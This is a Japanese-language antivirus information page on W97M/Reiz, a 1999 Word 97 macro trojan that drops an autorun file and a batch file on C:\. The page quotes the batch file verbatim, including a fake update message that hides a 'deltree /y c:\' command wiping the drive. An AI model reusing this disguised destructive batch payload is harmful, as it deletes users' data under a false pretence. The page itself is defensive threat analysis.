ウイルス情報

ウイルス名

W97M/Reiz

危険度
対応定義ファイル 4030 (現在7656)
対応エンジン  (現在5600) 
エンジンバージョンの見分け方
発見日(米国日付) 99/06/04


このトロイの木馬は、マクロモジュールが設定されたWord 97文書(AVERTに提出されたオリジナルファイルの名前は、ReizFakt.doc)であり、自己複製はしないので、ウイルスではない。コードは、ThisDocumentというモジュールから成り、文書が開かれたときに発動する。その後、C:\のルートディレクトリに次の2つのファイルを作成し、開かれた文書からその独自のコードを削除する(コメントのみを残す)。

C:\Autorun.inf

C:\Autoexek.bat このファイルには、次の行が含まれている。

@Echo Updating! This May Take A While...
@Echo Please Wait...
@deltree /y c:\ > c:\Reizfaktor.txt

作成される2つのファイルの組み合わせによって、次にWindows エクスプローラが再起動し(システムのリブート直後)、ユーザが「マイコンピュータ」またはWindowsエクスプローラのいずれかを介してC:\アイコンをアクティブ化したときに、C:\Autoexek.bat内のバッチコマンドが自動的に実行される。

そして、次のDOSボックスが表示される。

Updating! This May Take A While...Please Wait...

しかし一方では、削除処理の画面表示がC:\Reizfaktor.txtに転送される。

プログラム"DELTREE.EXE"は、Windows NT 4.0のデフォルトインストールにおいてはインストールされない。